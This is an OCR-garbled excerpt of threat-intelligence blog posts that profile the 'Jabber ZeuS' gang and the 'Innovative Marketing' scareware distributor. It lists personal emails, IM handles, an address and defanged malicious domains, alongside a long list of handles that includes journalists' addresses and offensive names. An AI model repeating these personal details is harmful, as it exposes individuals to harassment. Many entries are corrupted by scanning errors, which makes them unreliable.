mh@evil.im 

mickymousel2@exploit.im 

mikey.smith@mirror.co.uk 

milkbOne@riseup.net 

minimal@lsd-25.ru 

mitchmurder@dxseven.com 

molotovinq@jabb3r.org 

mongolian@riseup.net 

mons@memeware.net 

moonzy@redreserve.org 

mrcashiersl@jabber.se 

mulato@exploit.im 

muz@falcona.com.au 

nadia@mokkingbird.com 

negative@live.co.uk 

neil@insanitygroup.com 

neo@null.pm 



neoundergrond@bk.ru 

neslo@echofox.gg 

netta@thisisthemovement.org 

networking@tutamail.com 

nezla@evil.im 

nhayase@riseup.net 

nicholas.deleon@motherboard.tv 
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nickreddick@primarytalent.com 
nikki@teallmanagement.com 
nitasha _tiku@wired.com 
nix@evil.im 

notes@silversanction.com 

novathefed@xmpp.jp 

nozomu@neko.li 

nscola@politico.com 

nullboom@jabber.se 

nxf@evil.im 

nxro@xmpp.com 

nympho@riseup.net 



oakkaya@crypt.mn 

observernokuro@protonmail.com 

oedipus@xmpp.jp 

og@jabbim.cz 

oliver.laughland@theguardian.com 

oooo@riseup.net 

opgOd@riseup.net 

optic@revxp.com 

opyemen@riseup.net 

packet@null.pm 

pain@blackjabber.cc 

panic@riseup.net 

para@riseup.net 

pecxrOOt@creep.im 

pixelOrd@riseup.net 

pjs@wmeentertainment.com 

plasticmodem@programmer.net 

pmck@pmcklive.com 

pop@blackhat.cat 

poptartpounder@nigge.rs 



posters@worldstarhiphop.com 

prOb@jabber.se 

press@remove.pm 

press@vvpllc.com 

program@ardanradio.com 

proud@pomf.cat 

prvlulz@sigaint.org 

pureelite@conference.riseup.net 

purplecolor@blackjabber.cc 

rOOtsecur@xmpp.jp 

r3a@og.dk 

r@raylo.co 

racks@xmpp.jp 

raffi@strategiccyber.com 

raincoaster@unseen.is 

rapefugee@europe.com 

raun@riseup.net 

raymond.b@fuzagaming.us 
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razorblade@Onllne.cc 



redhack@activist.com 

refracts@lucky7.gg 

reklamajansi@mail.com 

rgctree@icloud.com 

richard.holmes@buzzfeed.com 

richiemalone@aol.com 

rift@xmpp.jp 

risatan@riseup.net 

riul872@jabber.se 

roOted@riseup.net 

robert.k@techie.com 

root@ic.fbi.gov 

root@leakbase.pw 

ryan@exploit.im 

ryan@rjgallagher.co.uk 

ryan@rm-rf.ninja 

ryan@thug.org 

s@sad.men 

salem@jabber.otr.im 

sarah.isgur.flores@usdoj.gov 



sasukels@exploit.im 

sauli@jabber.otr.im 

sceditorial@haymarket.com 

scene@black.intoxvs.info 

sean@evil.im 

secluded@evil.im 

secure@microsoft.com 

semaj@jabber.se 

servers@crypt.mn 

sest@protonmail.ch 

sheldon@creep.im 

shenron@evil.im 

sherazali@royallepage.ca 

shmOOp@lowermyjews.org 

shockanon@protonmail.com 

shodan@darkness.su 

shows@badazzmusic.com 

sicario@creep.im 

sifying@swissjabber.ch 

sinful@darkness.su 



sky berry86busi ness@aol.com 

slacka@nigge.rs 

snipersnague@xmpp.jp 

social@ironbuttz.com.au 

sohcra@riseup.net 

soulmech@creep.im 

soulmech@cryptostorm.is 

spencer.ackerman@thedailybeast.com 

spencerackerman@protonmail.com 
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spite@riseup.net 

spoof@thug.org 

stackoverflowin@tuta.io 

stank@blah.im 

steve@cnbc.com 

strive@null.pm 

stunned@xabber.de 

sudosev@protonmail.ch 

superspooki@exploit.im 

support@lookout.com 



support@ohrange.co 

support@spinrilla.com 

syncing@darkness.su 

syriancyberarmy@xtcmail.com 

tanzer@darerising.gg 

teampOison@riseup.net 

technology@huffingtonpost.com 

teepa@xmpp.jp 

teepee@csa.gg 

tehlulzywolf@jabber.otr.im 

telnet@lsd-25.ru 

teri@jabber.se 

testl23@0nllne.cc 

theoriginalyurei@xmpp.zone 

theralph@theralphretort.com 

tim@tagg.ly 

tips@popsci.com 

tips@techcrunch.com 

tmu@thug.org 

tommyb@creativesoulsmediagroup.com 



tongue@rickyberwick.com 

topol@tormail.org 

twitter@gusclass.com 

uchiha@thug.org 

ug@fbi.gov 

ug@jabber.se 

uglegion300@jabber.se 

unity.exe@riseup.net 

v0ld4m0rt@protonmail.com 

v8@evil.im 

v8@exploit.im 

vanda@vandathegod.com 

vc@cock.li 

vc@xmpp.is 

vegard@ufa.no 

vicious@riseup.net 

vickie@whitemanagement.co.uk 

videosawesome@mail.com 

vil@nigge.rs 

vill@xmpp.jp 
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violentexploit@xor.li 

vito@relyy.com 

voidsta@riseup.net 

volatile@digitalgangster.com 

voxi@evil.im 

warfare@live.com 

waters@lucky7.gg 

will@wstraf.me 

william@theoutline.com 

windanon@riseup.net 

wtf@protonmail.ch 

x64bit@exploit.im 

xeaned@swissjabber.ch 

xev@xmpp.jp 

yurei@yax.im 

z@exiled.si 

z@goat.si 

zen@exploit.im 

zihmp@cocaine. ninja 



zmb@jabber.se 

zora@jabb3r.de 

zyqnlc@jappix.io 

We'll post new updates and will update this list as soon as 
new developments take place. 

1. https://ddanchev.blo as pot.com/2011/10/exposin a -market- 
for-stolen-credit-cards 31.html 

2. https://otr.c v pherpunks.ca/ 

3. https://electrospaces.blo as pot.com/2017/Q6/dutch- 
russian-cvber-crime-case-reveals.html 

4. https://en.wikipedia.or a /wiki/Lawful_interception 
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Exposing Evgeniy Mikhaylovich Bogachev and the 
"Jabber ZeuS" Gang - An OSINT Analysis 

(2019-07-29 17:18) 

Continuing the " [1JFBI Most Wanted Cybercriminals 11 

series I've decided to take a closer look at the "Jabber ZeuS" 

including [2]Evgeniy Mikhaylovich Bogachev for the 

purpose of providing actionable intelligence on the 
fraudulent 

and malicious infrastructure that was utilized in the 
campaign including personally identifiable information of the 





individuals behind it with the idea to assist law enforcement 
and the U.S Intelligence community with the necessary 

data to track down and prosecute the individuals behind the 
campaign. 

In this post I'll provide actionable intelligence on the 
infrastructure used by the "Jabber ZeuS" gang including 

personally identifiable information for Evgeniy Mikhaylovich 
Bogachev and some of his known associates. 

Sample Personal Photos of Evgeniy Mikhaylovich 
Bogachev: 
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Slavik's IM and personal email including responding 
IP: 





bashorg@talking.ee - 112.175.50.220 

Personal Address: 

Lermontova Str. Anapa, Russian Federation 

Instant Messaging account: 

Iuckyl2345@jabber.cz 

Related name servers: 

ns.humboldtec.cz - 88.86.102.49 
ns2.humboldtec.cz - 188.165.248.173 

Related domains part of a C &C phone-back location: 

hxxp://sl aviki-resl.com 
hxxp://slavikl.com - 91.213.72.115 
hxxp://slavik2.com 
hxxp://slavik3.com 

Slavik's primary email: 

Iuckycats2008@yahoo.com 

Slavik's ICQ numbers: 

ICQ - 42729771 
ICQ - 312456 
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Zeus 2 vs. Zeus 2+ 

Is the Zeus Project really dead? 


name 

pass 

mold drain 


NS 

chingi. 

fslavik 

: 





Related emails known to have participated in the 
campaign: 

alexgarbar-ch uck@yahoo.com 

bollinger.evgeniy@yandex.ru 

charajiangl6@gmail.com 

Related domains known to have participated in the 
campaign: 

hxxp://visitcoastweekend.com - 103.224.182.253; 
70.32.1.32; 192.184.12.62; 141.8.224.93; 69.43.160.163 

hxxp://incomeet.com - 192.186.226.71; 66.199.248.195 

hxxp://work.businessclub.so 

Related information on his colleague (chingiz) as 
seen in the attached screenshot: 











Real Name: Galdziev Chingiz 

Related domains known to have participated in the 
campaign: 

hxxp://fizot.org 

hxxp://fizot.com - 50.63.202.35; 184.168.221.33 
hxxp://poymi.ru - 109.206.190.54 

Related name servers known to have participated in 
the campaign: 

nsl.fizot.com - 35.186.238.101 

ns2.fizot.com 

Related domain including an associated email using 
the same name server: 

hxxp://averfame.org - harold@avereanoia.org 

Google Analytics ID: UA-3816538 
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Related domains known to have participated in the 
campaign: 

hxxp://a wmproxy.com 

hxxp://pornxplayer.com 

Related emails known to have participated in the 
campaign: 


fizot@mail.ru 



xtexgroup@gmail.com 

xtexcounter@bk.ru 

Related domains known to have responded to the 
same malicious and fraudulent IP - 178.162.188.28: 

hxxp://dnevnik.cc 

hxxp://xvpn.ru 

hxxp://xsave.ru 

hxxp://anyget.ru 

hxxp://nezayti.ru 

hxxp://proproxy.ru 

hxxp://hitmovies.ru 

hxxp://appfriends.ru 

hxxp://naraboteya.ru 

hxxp://naraboteya.ru 

hxxp://a wmproxy.com 

hxxp://zzyoutu be.com 

hxxp://pornxplayer.com 

hxxp://a wmproxy.net 

h xx p: //c h ec ke r p roxy. n et 

Related domains known to have participated in the 
campaign: 



hxxp://fizot. I ivejournal.com/ 
hxxp://russi aru.net/fizot/ 

Instant Messaging Account: 

ICQ - 795781 

Related personally identifiable information of 
Galdziev Chingiz: 

hxxp://phpnow.ru 

ICQ - 434929 

Email: info@phpnow.ru 

Related domains known to have participated in the 
campaign: 

hxxp://fi I mv.net 

hxxp://fi nance-customer.com 

hxxp://fi relinesecrets.com 

hxxp://fl I mphpxpwqeyhj.net 

hxxp://fl sunstate333.com 

Related individuals known to have participated in the 
campaign: 

Slavik, Monstr, 100, Null, nvidiag, zebra7753, lexa _Mef, 
gss, iceIX, Harderman, Gribodemon, Aqua, aquaSecond, 

it, percent, cpOl, hct, xman, Pepsi, miami, miamibc, 
petrOvich, Mr. ICQ, Tank, tankist, Kusunagi, Noname, Lucky, 



Bashorg, Indep, Mask, Enx, Benny, Bentley, Denis Lubimov, 
MaDaGaSka, Vkontake, rfcid, parik, reronic, Daniel, bxl, 
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Daniel Hamza, Danielbxl, jah, Jonni, jtk, Veggi Roma, D frank, 
duo, Admin2010, h4x0rdz, Donsft, mary.J555, susanneon, 
kainehabe, virus _e 2003, spaishp, sere.bro, muddem, 
mechanlzm, vlad.dimitrov, jheto2002, sector.exploits 

Related Instant Messaging accounts and emails 
known to have participated in the campaign: 

iceix@secu re-jabber, biz 

shwark.power.andrew@gmail.com 

johnlecun@gmail.com 

gribodemon@pochta.ru, 

glazgo-update-notifier@gajim.org 

gribo-demon@jabber.ru 

aqua@incomeet.com 

miami@jabbluisa.com 

um@jabbim.com 

hof@headcounter.org 

theklutch@gmail.com 

niko@grad.com 

Johnny@guru.bearin.donetsk.au 



petrOvich@incomeet.com 

mricq@incomeet.com 

T4ank@ua.fm 

tank@incomeet.com 

getreadysafebox.ru 

john.mikleymail.com 

alexeysafinyahoo.com 

rnoscow.berlin@yahoo.com 

cruelintention@email.ru, 

bind@ernail.ru 

firstmenl7@rarnbler.ru 

benny@jabber.cz 

airlordl988@gmail.com 

bxl@hotmail.com 

i _amhere@hotmail.fr 

daniel.h.b@universityofsutton.com 

princedelune@hotmail.fr 

bxl _@msn.com 

danibxl@hotmail.fr 

danieldelcore@hotmail.com. 



d.frank@jabber.jp 

d.frank@Onllne.at 

duo@jabber.cn 

fering99@yahoo.com 

secustar@mail.ru 

h4x0rdz@hotmail.com 

Donsft@hotmail.com 

mary.j555@hotmail.com 

susanneon@googlemail.com 

kainehabe@hotmail.com 

virus _e _2003@hotmail.com 

spanishp@hotmail.com 

sere.bro@hotmail.com 
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lostbuffer@hotmail.com 

lostbuffer@gmail.com 

vlad.dimitrov@hotmail.com 

jheto2002@gmail.com 

sector.exploits@gmail.com 



We'll post new updates as soon as new developments take 
place. 

Related posts: 

[3] Exposing Iran's Most Wanted Cybercriminals - FBI Most 
Wanted Checklist - OSINT Analysis 

[4] Who's Behind the Syrian Electronic Army? - An OSINT 
Analysis 

1. https://ddanchev.blo as pot.com/2019/07A/vhos-behind- 
s vrian-electronic-armv.html 

2. https://www.fbi. a ov/wanted/cvber/ev a eniv-mikhailovich- 
bogachev 

3. https://ddanchev.blo as pot.com/2019/01/exposin a -irans- 
most-wanted.html 

4. https://ddanchev.blo as pot.com/2019/07/whos-behind- 
s vrian-electronic-armv.html 
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Profiling "Innovative Marketing" - The Flagship 
Malvertising andf Scareware Distributor - Circa 2008 - 
An 

OSINT Analysis (2019-07-30 14:50) 

Continuing the 11 [1]FBI Most Wanted Cybercriminals 11 

series I've decided to take a closer look at" [2]lnnovative 
Marketing" the primary malvertising and scareware 
distributor participating in several high-profile malvertising 




















and seareware-serving campaigns circa 2008 including 
personally identifiable information on two of the main group 

operators - [3]Shaileshkumar P. Jain and [4]Bjorn Daniel 
Sundin with the idea to provide law enforcement and the 
U.S Intelligence community with the necessary information 
to track down and prosecute the gang behind these 

campaigns. 
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In this post I'll profile actionable intelligence on the 
infrastructure behind the "Innovative Marketing" 
malvertising and scareware distributor circa 2008 including 
personally identifiable information on two of the key 
members of the gang. 

Known "Innovative Marketing" alternative brand 
names and related associates: 

Billingnow 

Bi 11 Planet PTE Ltd. 

Globedat 

Innovative Marketing Ukraine 
Revenue Response 
Sunwell 

Synergy Software BV 
Winpayment 


Consultancy SPC 
Winsecure Solutions, 

Winsolutions FZ-LLC 

ByteHosting Internet Services, LLC 

Setupahost.net 

Known related campaigns and related brands 
launched by the same group: 

BurnAds 

UniqAds 

Infyte 

NetMediaGroup 

Forcellp 

Related malicious and fraudulent domains known to 
have participated in the campaign: 

hxxp://ad2cash.net 

hxxp://adtraff.com 
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hxxp://adzyclon.com 
hxxp://bestad media.com 
hxxp://bestsearch net.com 
hxxp://bucksbill.com 



hxxp://bu rnads.com 
hxxp://casi noaceking.com 
hxxp://cry ptdrive.com 
hxxp://fi leprotector.com 
hxxp://forceup.com 
hxxp://freetvnow.net 
hxxp://fu lsearch.com 
hxxp://g etfreecar.com 
hxxp://g reyhathosting.com 

Related malicious and fraudulent domains known to 
have participated in the campaign: 

hxxp://i nstallprovider.com 

hxxp://l ibresystm.com 

hxxp://mag icsearcher.com 

hxxp://money palacecash.com 

hxxp://my health-1 ife.org 

hxxp://myon I inefinance.com 

hxxp://netmed iagroup.net 

hxxp://nettu rbopro.com 

hxxp ://newbieadg uide.com 



hxxp://pcsu percharger.com 
hxxp://popsmedia.com 
hxxp://popu pnukerpro.com 
hxxp://prizesforyou.com 
hxxp://sea rchcolours.com 
hxxp://sea rchoperation.com 
hxxp://sel I moresoft.net 
hxxp://sel I mysoft.net 
hxxp://sharpad verts.com 
hxxp://softwcs.com 
hxxp://tal lgrass-seach.com 
hxxp://theri ngtonesource.com 
hxxp://traffalo.com 
hxxp://u nicsearch.com 
hxxp://uniqads.com 
hxxp://vitecmed ia.com 
hxxp://wewi I lfind.com 
hxxp://wi ndefender.com 
hxxp://workhomecenter.com 
hxxp://you rseeker.com 



hxxp://you rteacheronline.com 
hxxp://zappi nads.com 

Related scareware products known to have been sold 
and distributed by "Innovative Marketing": 

SpyGuarder 

Spy Killer Pro 
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Spyware Sweeper 
Spywarelsolator 
SwiftCleaner 
SystemDoctor 
System ErrorFixer 
Systems weeper 
TotalAntivirus 
Trasheraser 
Trustedprotecion 
Ultima teCI earner 
VirusRemover 2008 
Win,Anti Spy ware 


WinAntiVirusPro 



WinBugFixer 

WinDefender2008 

WinFixer 

Winsecureav 

WinSpyware Protect 

WinxDefender 

XLifeGuarder 

XP AntiSpyware 2009 

XP AntiVirus 

Related domains known to have participated in the 
campaign: 

hxxp://acchiappavi rus.com 
hxxp://ad iosvirus.com 
hxxp://a horrememoria.com 
hxxp://a ltalimpeza.com 
hxxp://a non imutente.com 
hxxp://ad2cash.net 
hxxp://ad 2 profit.com 
hxxp://adcomatoz.com 
hxxp://adg urman.com 



hxxp://adhokuspokus.com 
hxxp://ad netserver.com 
hxxp://ad 2 profit.com 
hxxp://adcomatoz.com 
hxxp://adg urman.com 
hxxp://adhokuspokus.com 
hxxp://ad netserver.com 
hxxp://ad red ired.com 
hxxp://adsol utio.com 
hxxp://adtraff.com 
hxxp://adverdaemon.com 
hxxp://adverlou nge.com 
hxxp://adzyclon.com 
hxxp://ad red ired.com 
hxxp://adsol utio.com 
hxxp://adtraff.com 
hxxp://adverdaemon.com 
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hxxp://adverlou nge.com 
hxxp://adzyclon.com 



hxxp://a lg-search.com 
hxxp://a lhoster.com 
hxxp://aligarx.biz 
hxxp://all-search-it.com 
hxxp://alphatown.us 
hxxp://anmira.info 
hxxp://a nonymbrowser.com 
hxxp://a ntivirussecuritypro.com 
hxxp://aptprog.com 
hxxp://art-earn.biz 
hxxp://astal aprofit.com 
hxxp://a ntiamenazas.com 
hxxp://a ntiespiamaestro.com 
hxxp://a ntievidence.com 
hxxp://a ntispionimaestro.com 
hxxp://a ntispywareconductor.com 
hxxp://a ntispywarecontrol.com 
hxxp://a ntispywaremaster.com 
hxxp://a ntispywaremeister.com 
hxxp://a ntivirusfiable.com 



hxxp://a ntivirusforall.com 
hxxp://a ntivirusforalla.com 
hxxp://a ntivirusforalle.com 
hxxp://a ntivirusfueralle.com 
hxxp://a ntivirusgenial.com 
hxxp://a ntivirusmagique.com 
hxxp://a ntivirusparatodos.com 
hxxp://a nzentsuru.com 
hxxp://apagahistorico.com 
hxxp://a polloantivirus.com 
hxxp://a ntivirussecuritypro.com 
hxxp://astal aprofit.com 
hxxp://b2adz.com 
hxxp://bestad media.com 
hxxp://bestpharmacydeals.com 



hxxp://a rchivosenestado.com 

hxxp://atemaiserro.com 

hxxp://atrapavi rus.com 

hxxp://aucu nchoixpourvirus.com 

hxxp://aucu nefaute.com 

hxxp://aucu ninfection.com 

hxxp://aucu nmenace.com 

hxxp://aucu nserreurs.com 

hxxp://avcompleto.com 

hxxp://autodealer-search.com 

hxxp://b2adz.com 

hxxp://bazaard.com 

hxxp://belkran.com 
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hxxp://belshar.com 
hxxp://bestad media.com 
hxxp://avsecu rityplus.com 
hxxp://avseg uro.com 
hxxp://bandoai virus.com 



hxxp://bandoal lei nfezioni.com 

hxxp://barrerai ntegral.com 

hxxp://basti oneantivirus.com 

hxxp://beskyttelseon I ine.com 

hxxp://beskyttendevaerktoj.com 

hxxp://bestsel lerantivirus.com 

hxxp://best-biznes.info 

hxxp://best-cools.info 

hxxp://bestdatafi nder.com 

hxxp://besteversearch.com 

hxxp://bestpharmacydeals.com 

hxxp://best-screensavers.biz 

hxxp://bestsearch net.com 

hxxp://bestshopz.com 

hxxp://bestsearch net.com 

hxxp://bestshopz.com 

hxxp://bestwnvmovies.com 

hxxp://bizadverts.com 

hxxp://bizmarketads.com 

hxxp://bestwm.info 



hxxp://bestwnvmovies.com 

hxxp://bezzz.info 

hxxp://bi-bi-search.com 

hxxp://bizadverts.com 

hxxp://bizmarketads.com 

hxxp://blessedads.com 

hxxp://bm-redy.com 

hxxp://bovavi.com 

hxxp ://brand marketads.com 

hxxp ://blanchd isc.com 

hxxp://borresuspasos.com 

hxxp://bossedeserreu rs.com 

hxxp://brossedesfautes.com 

hxxp://bugseraser.com 

hxxp://blessedads.com 

hxxp ://brand marketads.com 

hxxp ://bucksi nsoft.com 

hxxp ://bu rnads.com 

hxxp ://ca ncerno.com 

hxxp ://bucksi nsoft.com 



hxxp://bu rnads.com 
hxxp://ca ncerno.com 
hxxp://ca ndid-search.com 
hxxp://carpropane.com 
hxxp://ca iforavirus.com 
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hxxp://ceroamenazas.com 
hxxp://cerovi rus.com 
hxxp://chasseu rdeserreures.com 
hxxp://cleanerpotente.com 
hxxp://cash loan profit.com 
hxxp://casi noaceking.com 
hxxp://casi nodealsgalore.com 
hxxp://cheap-auto-deals.com 
hxxp://cash loan profit.com 
hxxp://casi noaceking.com 
hxxp://casi noby.com 
hxxp://casi nodealsgalore.com 
hxxp://cleanpctool.com 
hxxp://cleanu ptool.com 



hxxp://confidentsu rf.com 

hxxp://confidentuser.com 

hxxp://conten idoseguros.com 

hxxp://clubheat.info 

hxxp://come-from-stars.com 

hxxp://co-search.com 

hxxp://creamme.net 

hxxp://cry ptdrive.com 

hxxp://contenteraser.com 

hxxp://controledemenaces.com 

hxxp://control I oreprivacy.com 

hxxp://cu rerrores.com 

hxxp://cyndyk.info 

hxxp://deuscleanerpay.com 

hxxp://d idosearch.com 

hxxp://diphelp.biz 

hxxp://dmitry-v.info 

hxxp://doma2000.com 

hxxp ://dataconfidential ity.com 

hxxp://defensaantivi rus.com 



hxxp://defensecelebre.com 
hxxp://defenseded river.com 
hxxp://defensedi nformation.com 
hxxp://defensedud isque.com 
hxxp://defensenetsu rfage.com 
hxxp://defensi vesystem.com 
hxxp://dej itarufukugen.com 
hxxp://dej itarukyoikira.com 
hxxp://dej itaruwakuchin.com 
hxxp://detapu rotekuta.com 
hxxp://deta ripea.com 
hxxp://detectaerro res.com 
hxxp://d iscoseguro.com 
hxxp://d iskassistent.com 
hxxp://d iskretter.com 
hxxp://d isksaeuberung.com 
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hxxp://d isksizesaver.com 
hxxp://d isksparare.com 
hxxp://d isukushuri.com 



hxxp://dou bledefender.com 
hxxp://d riversecurise.com 
hxxp://ei nwandfreierpc.com 
hxxp://el iminadordeamenazas.com 
hxxp://el mejorantivirus.com 
hxxp://d urtsev.com 
hxxp://easybestdeals.com 
hxxp://energostroj.com 
hxxp://enothost.com 
hxxp://eroticabsol ute.com 
hxxp://emperahogo.com 
hxxp://en mi endaerrores.com 
hxxp://equ ipoantiespia.com 
hxxp://eracheisa.com 
hxxp://erasutoppu.com 
hxxp://erreu rchasseur.com 
hxxp://errorfi ghter.com 
hxxp://essenti aleraser.com 
hxxp://expertda ntispyware.com 
hxxp://errord igger.com 



hxxp://errori nspector.com 
hxxp://evrogame.info 
hxxp://fandasearch.com 
hxxp://fantazy bill.com 
hxxp://extermi nadordevirus.com 
hxxp://extremuclean.com 
hxxp://fairu kyua.com 
hxxp://fei lvakt.com 
hxxp://fej lfripc.com 
hxxp://fantazy bill.com 
hxxp://favou riteshop.com 
hxxp://fi leprotector.com 
hxxp://forceup.com 
hxxp://freepcsecu re.com 
hxxp://fastwm.info 
hxxp://fastzetup.info 
hxxp://fati-gati-search.com 
hxxp://favou rable-search.com 
hxxp://favou riteshop.com 
hxxp://feel-sea rch.com 



hxxp://f-host.net 
hxxp://fifaal lchamp.com 
hxxp://fi ght-arts.com 
hxxp://fej I reparering.com 
hxxp://felfixare.com 
hxxp://ferramentadesol ucao.com 
hxxp://ferramentaseg ura.com 
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hxxp://festpl attencleaner.com 
hxxp://festplattentool.com 
hxxp://fi ksdinpc.com 
hxxp://fi ltredetraces.com 
hxxp://fi ltrototal.com 
hxxp://fi leprotector.com 
hxxp://fi ndbyall.com 
hxxp://fi rstbestsearch.com 
hxxp://fi rstlastsearch.com 
hxxp://fi rst-ts.com 
hxxp://fixthemnow.com 
hxxp://fj ernervirus.com 



hxxp://fouten wacht.com 
hxxp://g eheugenredder.com 
hxxp://foampl astic.net 
hxxp://fokus-search.com 
hxxp://force-search.com 
hxxp://forceup.com 
hxxp://forex-instruments.info 
hxxp://forceup.com 
hxxp://forvatormail.com 
hxxp://freepcsecu re.com 
hxxp://freerepair.org 
h xx p: //f re etv now.net 
hxxp://friedads.com 
hxxp://freetvnow.net 
hxxp://friedads.com 
hxxp://g etfreecar.com 
hxxp://g lorymarkets.com 
hxxp://g reat4mac.com 
hxxp://g reyhathosting.com 
hxxp://fu lsearch.com 



hxxp://g etfreecar.com 

hxxp://gibdd.us 

hxxp://g lass-search.com 

hxxp://g lorymarkets.com 

hxxp://g osthost.net 

hxxp://g reat4mac.com 

hxxp://g reyhathosting.com 

hxxp://gt-search.com 

hxxp://hackerpro.us 

hxxp://hard I inecenter.com 

hxxp://g uardiandelaprivacidad.com 

hxxp://g uardianodelpc.com 

hxxp://g ubbishremover.com 

hxxp://hackerstaisaku.com 

hxxp://hadodorai bugado.com 

hxxp ://hardd riveguard.com 

hxxp://herramientaseg ura.com 

hxxp ://h istorialout.com 
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hxxp ://hebooks-service.com 



hxxp ://i ddqdmarketing.com 

hxxp://i nfyte.com 

hxxp ://i nstallprovider.com 

hxxp://hebooks-service.com 

hxxp ://h intway-international.com 

hxxp ://homeofsite.com 

hxxp ://h romeos.com 

hxxp://hyip2all.org 

hxxp ://hotbevakn ing.com 

hxxp ://i ngavirus.com 

hxxp://i ngenmulighetforvirus.com 

hxxp ://i nhaltsaeuberung.com 

hxxp://icq-lot.org 

hxxp ://i ddqdmarketing.com 

hxxp ://i deal-search.com 

hxxp ://i dea-rem.com 

hxxp ://i-forexbank. biz 

hxxp://i nfyte.com 

hxxp ://i nhaltspeicher.com 

hxxp ://i nmunepc.com 



hxxp://ka kujitsutsuru.com 
hxxp://kei nespurenlassen.com 
hxxp://kei neviren.com 
hxxp://i nitial-search.com 
hxxp://i nsochi2014.com 
hxxp://i nstallprovider.com 
hxxp://i nternetadaultfriend.com 
hxxp://i nternetadaultfriend.com 
hxxp://i nternetanonymizer.com 
hxxp://i ntervarioclick.com 
hxxp://i nvulnerableads.com 
hxxp://i nternetanonymizer.com 
hxxp://i nternetsupernanny.com 
hxxp://i ntervarioclick.com 
hxxp://i nvestmentsgroup.org 
hxxp://i nvulnerableads.com 
hxxp://it-translation.biz 
hxxp://izol-tech.com 
hxxp://ka merton-tests.com 
hxxp://kazi I kasearch.com 



hxxp://keytooday.com 
hxxp://key wordcpv.com 
hxxp://kiridi.net 
hxxp://kpoba.net 
hxxp://kurgan45.info 
hxxp://key wordcpv.com 
hxxp://l ibresystm.com 
hxxp://l uckyadcoin.com 
hxxp://l uckyadsols.com 
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hxxp://mag icsearcher.com 
hxxp://knowhowprotection.com 
hxxp://konsekiauto.com 
hxxp://kontentsufi ruta.com 
hxxp://ku rinkonseki.com 
hxxp://kyoi ireza.com 
hxxp://kyoi kanshi.com 
hxxp://kyoryokucleaner.com 
hxxp://largavidapc.com 
hxxp://l aufwerkcleaner.com 



hxxp ://l impiapc.com 

hxxp://ladadc.com 

hxxp ://l anastyle.com 

hxxp://ldizain.info 

hxxp ://l ibresystm.com 

hxxp://liders.biz 

hxxp://linii.net 

hxxp ://preved marketing 

hxxp ://mal ware-scan.com 

hxxp ://l impietodo.com 

hxxp ://lomejorenanti virus.com 

hxxp ://long I ifepc.com 

hxxp ://l ungavitapc.com 

hxxp ://maechti gerreiniger.com 

hxxp://liveclix.net 

hxxp ://loffersearch.com 

hxxp ://londasearch.com 

hxxp://lovecraft-forum.net 

hxxp ://loveopen. info 

hxxp://lseom.biz 



hxxp ://l uckyadcoin.com 
hxxp://l uckyadsols.com 
hxxp ://mad-search. com 
hxxp ://mag icsearcher.com 
hxxp://mailcap.info 
hxxp ://manage-sea rch.com 
hxxp ://marketi ngdungeon.com 
hxxp ://mass-send.com 
hxxp ://max-expo. net 
hxxp ://mal wareschutz.com 
hxxp ://manutencaopc.com 
hxxp ://memorisebu.com 
hxxp ://menacecontrole.com 
hxxp ://menacefig hter.com 
hxxp ://maxya noff.com 
hxxp ://med iatornado.com 
hxxp://mega-project.biz 
hxxp://megashopcity.com 
hxxp ://mi ghtyfaq.com 
hxxp ://menacemon itor.com 
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hxxp://menacescru bber.com 
hxxp://menacesprotection.com 
hxxp://mi avcompleto.com 
hxxp://mi ghtycleaner.com 
hxxp://mi nnesparere.com 
hxxp://mon itordeamenazas.com 
hxxp://moteu rpcpro.com 
hxxp://money palacecash.com 
hxxp://mou nthost.net 
hxxp://myfavou ritesearch.com 
hxxp://my health-1 ife.org 
hxxp://mycontentassistant.com 
hxxp://netsu rfageassure.com 
hxxp://nettoyeu rdepc.com 
hxxp://nettoyeu rdeserreures.com 
hxxp://myfavou ritesearch.com 
hxxp://my health-1 ife.org 
hxxp://myon I inefinance.com 
hxxp://mysu rvey4u.com 



hxxp://myon I inefinance.com 
hxxp://mysu rvey4u.com 
hxxp://myth marketing.com 
hxxp://mytravel geek.com 
hxxp://myth marketing.com 
hxxp://mytravel geek.com 
hxxp://netmed iagroup.net 
hxxp://nettu rbopro.com 
hxxp://onestopshopz.com 
hxxp://myusefu lsearch.com 
hxxp://napol.net 
hxxp://navygante.com 
hxxp://netmed iagroup.net 
hxxp://nettu rbopro.com 
hxxp://netmed iagroup.net 
hxxp://nettoyeu rdevirus.com 
hxxp://nettoyeu rpuissant.com 
hxxp ://neuerantivi rus.com 
hxxp://neuersch ild.com 
hxxp ://newbieadg uide.com 



hxxp://nryb.com 
hxxp://of-by.info 
hxxp://olgalml.com 
hxxp://ol-search.com 
hxxp://onedaysoft.com 
hxxp://n ientetracce.com 
hxxp://nouvel antivirus.com 
hxxp://n urdeinpc.com 
hxxp://oh nespurensurfen.com 
hxxp://omel horantivirus.com 
hxxp://on I inehelpmate.com 
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hxxp://on I ineverktyg.com 
hxxp://on rain purotekuta.com 
hxxp://onestopshopz.com 
hxxp://onwey.com 
hxxp://opensols.com 
hxxp://ori ginal-search.com 
hxxp://osetua.com 
hxxp://osminog.org 



hxxp://opensols.com 

hxxp://pcsoftw.com 

hxxp://pcsu percharger.com 

hxxp://popadprovider.com 

hxxp://popsmedia.com 

hxxp://ordu reffaceur.com 

hxxp://oru ripea.com 

hxxp://pasderreu rs.com 

hxxp://pasdesfautes.com 

hxxp://pasdesmenaces.com 

hxxp://parischat.org 

hxxp://passwordi nspector.com 

hxxp://pcsoftw.com 

hxxp://pcsu percharger.com 

hxxp://pasendommagement.com 

hxxp://pasplusdespertes.com 

hxxp://pasplusdevirus.com 

hxxp://pcanti viruspro.com 

hxxp://pcassertor.com 

hxxp://pcbewaker.com 



hxxp://pcboosterp ro.com 
hxxp://pcbunan.com 
hxxp://pceternel.com 
hxxp://pcforfender.com 
hxxp://pchealth keeper.com 
hxxp://pchjael per.com 
hxxp://pci nforedder.com 
hxxp://pcl ibredevirus.com 
hxxp://pcohnespu ren.com 
hxxp://pcredskab.com 
hxxp://pcsansbug.com 
hxxp://pcsecu resystem.com 
hxxp://pcsecu rise.com 
hxxp://pcsenti neru.com 
hxxp://pcsiemprenueva.com 
hxxp://pctool pro.com 
hxxp://pcu ltralimpia.com 
hxxp://pcvei I igheidstool.com 
hxxp://pcvi russweeper.com 
hxxp://perfektanti virus, com 



hxxp://personal ityprotector.com 
hxxp://poseidonantivi rus.com 
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hxxp://pou pememoria.com 
hxxp://performanceopti mizer.com 
hxxp ://piramid ki.com 
hxxp://podelkin.info 
hxxp://popadprovider.com 
hxxp://popsmedia.com 
hxxp://popu pnukerpro.com 
